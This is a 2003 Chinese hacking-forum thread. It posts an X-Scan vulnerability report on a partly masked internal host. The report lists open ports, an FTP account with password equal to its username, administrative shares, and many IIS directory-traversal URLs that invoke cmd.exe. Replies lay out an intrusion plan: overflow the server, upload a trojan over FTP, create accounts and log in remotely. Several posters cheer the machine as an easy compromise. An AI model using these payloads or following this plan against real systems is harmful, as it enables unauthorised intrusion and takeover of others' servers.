|
![]() | 作者: jhz9 [jhz9]
![]() |
登录 |
X-Scan v2.3 检测报告 [扫描结果索引]: "172.16.**.**" 开放端口 Snmp口令 SSL漏洞 RPC漏洞 SQL-Server弱口令 FTP弱口令 NT-Server弱口令 SMTP漏洞 POP3弱口令 CGI漏洞 IIS漏洞 [NetBios信息] 服务器信息 网络共享资源列表 -------------------------------------------------------------------------------- 详细资料 [开放端口] 端口13开放: Daytime [Banner] 13:51:12 2003-6-24 [End of banner] 端口17开放: Quote of the Day [Banner] "When a stupid man is doing something he is ashamed of, he always declares that it is his duty." George Bernard Shaw (1856-1950) [End of banner] 端口21开放: FTP (Control) [Banner] 220 Netserver Microsoft FTP Service (Version 5.0). [End of banner] 端口19开放: Character Generator [Banner] !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh "#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi #$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij $%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk %&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl &'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm '()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn ()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno )*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop *+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq +,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr ,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs -./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij [End of banner] 端口25开放: SMTP, Simple Mail Transfer Protocol [Banner] 220 Netserver Microsoft ESMTP MAIL Service, Version: 5.0.2172.1 ready at Tue, 24 Jun 2003 13:51:12 +0800 [End of banner] 端口80开放: HTTP, World Wide Web [Banner] [None] [End of banner] 端口7007开放: afs3-bos basic overseer process [Banner] [None] [End of banner] 端口9开放: Discard [Banner] [None] [End of banner] 端口7开放: Echo [Banner] [None] [End of banner] 端口42开放: Host Name Server [Banner] [None] [End of banner] 端口53开放: domain, Domain Name Server [Banner] [None] [End of banner] 端口135开放: Location Service [Banner] [None] [End of banner] 端口139开放: NETBIOS Session Service [Banner] [None] [End of banner] 端口443开放: HttpS, Secure HTTP [Banner] [None] [End of banner] 端口445开放: Microsoft-DS [Banner] [None] [End of banner] 端口3389开放: Windows 2000 remote admin [Banner] [None] [End of banner] 插件类型: PORT 插件成员名称: 开放端口 插件作者: glacier 插件版本: 1.7 风险等级: 低 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 -------------------------------------------------------------------------------- [Snmp口令] -------------------------------------------------------------------------------- [SSL漏洞] -------------------------------------------------------------------------------- [RPC漏洞] -------------------------------------------------------------------------------- [SQL-Server弱口令] -------------------------------------------------------------------------------- [FTP弱口令] ftp/[口令与用户名相同] 插件类型: FTP 插件成员名称: FTP弱口令 插件作者: glacier 插件版本: 1.1 风险等级: 高 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 -------------------------------------------------------------------------------- [NT-Server弱口令] -------------------------------------------------------------------------------- [NetBios信息] [服务器信息 Level: 1]: 主机名称: "NETSERVER" 系统版本: 5.0 主机类型: PRINTQ_SERVER WINDOWS BACKUP_BROWSER SERVER_OSF SERVER_VMS DFS [网络共享资源列表 Level 1]: "E$": 磁盘 - [默认共享] "IPC$": 进程间通信(IPC$) - [远程 IPC] "D$": 磁盘 - [默认共享] "ntpasswd": 磁盘 - [] "F": 磁盘 - [] "ADMIN$": 磁盘 - [远程管理] "C$": 磁盘 - [默认共享] 插件类型: NETBIOS 插件成员名称: NetBios信息 插件作者: glacier 插件版本: 1.1 风险等级: 高 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 -------------------------------------------------------------------------------- [SMTP漏洞] -------------------------------------------------------------------------------- [POP3弱口令] -------------------------------------------------------------------------------- [CGI漏洞] /scripts/samples/search/qsumrhit.htw [漏洞描述] /scripts/samples/search/qfullhit.htw [漏洞描述] /null.ida [漏洞描述] /null.idq [漏洞描述] /_vti_inf.html [漏洞描述] /abczxv.htw [漏洞描述] /_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 [漏洞描述] /_vti_bin/shtml.dll/_vti_rpc [漏洞描述] /_vti_bin/shtml.exe [漏洞描述] /_vti_bin/shtml.dll/nosuch.htm [漏洞描述] /_vti_bin/shtml.dll [漏洞描述] 插件类型: HTTP 插件成员名称: CGI漏洞 插件作者: glacier 插件版本: 1.4 风险等级: 高 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 -------------------------------------------------------------------------------- [IIS漏洞] /a.asp/..%c1%1c../..%c1%1c../winnt/win.ini [漏洞描述] /a.asp/..%c0%2f../..%c0%2f../winnt/win.ini [漏洞描述] /_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] /Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] /Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] /_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] /PBServer/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] /Rpc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] /scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) 插件类型: HTTP 插件成员名称: IIS漏洞 插件作者: glacier 插件版本: 1.4 风险等级: 高 漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 -------------------------------------------------------------------------------- 扫描全部完成 |
地主 发表时间: 06/24 14:21 |
![]() | 回复: vishx [vishx] ![]() |
登录 |
改掉他的主页很简单~ 端口3389开放 ftp/[口令与用户名相同] E$": 磁盘 - [默认共享] "IPC$": 进程间通信(IPC$) - [远程 IPC] "D$": 磁盘 - [默认共享] "ntpasswd": 磁盘 - [] "F": 磁盘 - [] "ADMIN$": 磁盘 - [远程管理] "C$": 磁盘 - [默认共享] 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) |
B1层 发表时间: 06/24 15:21 |
![]() | 回复: 123 [china_fy] ![]() |
登录 |
兄弟你爽了。aspcode 漏洞溢出就可的到guest权限,我们用ftp上传木马,运行就可干活了。*.ida *.idq 就不要说了 ,溢出就可得到admin权限,可建用户,又有3389 远程登陆 |
B2层 发表时间: 06/25 11:34 |
![]() | 回复: jhz9 [jhz9] ![]() |
登录 |
啊~~ 我刚接触黑客~~ 不懂啊!! |
B3层 发表时间: 06/25 12:23 |
![]() | 回复: zhangkai [zhangkai] ![]() |
登录 |
我也不懂 谁来解释一下???? |
B4层 发表时间: 06/25 16:09 |
![]() | 回复: sweet_day [sweet_day] ![]() |
登录 |
兄弟能扫到这样的主机,不错哟!晕死 ~!漏洞一大堆!不知道他的网管是作什么吃的?呵呵! |
B5层 发表时间: 06/25 16:26 |
![]() | 回复: miku [miku] ![]() |
登录 |
开的端口是不是多了点? 我想不可否认被人入侵过的可能! [此贴被 ☆影子☆(miku) 在 06月25日16时32分 编辑过] |
B6层 发表时间: 06/25 16:33 |
![]() | 回复: k9k6k3 [k9k6k3] ![]() |
登录 |
我看啊~~是不是你自己打上去的啊? 就算是SB也不可能样这么多的LD存在啊~~ 那我们开心? |
B7层 发表时间: 06/25 17:06 |
![]() | 回复: dormouse [dormouse] ![]() |
登录 |
简直是大餐。。。。 |
B8层 发表时间: 06/25 17:23 |
![]() | 回复: hacker521 [hacker521] ![]() |
登录 |
不会是管理员装的蜜罐吧,现在怎么可能还有开这么多端口和漏洞的主机呀 |
B9层 发表时间: 06/25 17:35 |
![]() | 回复: aney [aney] ![]() |
登录 |
好东西啊~你爽呆了 |
B10层 发表时间: 06/25 18:21 |
![]() | 回复: bcliangzi [bcliangzi] ![]() |
登录 |
哈哈哈,不错!真是块不错的面包!管鲁员真够大方的!呵呵!谁还没有肉机呀!上吧。 |
B11层 发表时间: 06/25 21:08 |
![]() | 回复: napolun [napolun] ![]() |
登录 |
为什么我就没有这样的运气,唉。 |
B12层 发表时间: 06/25 22:55 |
![]() | 回复: wolfjin [wolfjin] ![]() |
登录 |
我估计是中蠕虫病毒一类的吧,怎么可能这么多!!! |
B13层 发表时间: 06/26 03:43 |
![]() | 回复: weigar [weigar] ![]() |
登录 |
美味到极点啊~~ 我几个星期没找到了 55~~~ 可怜的人啊 |
B14层 发表时间: 06/28 17:00 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号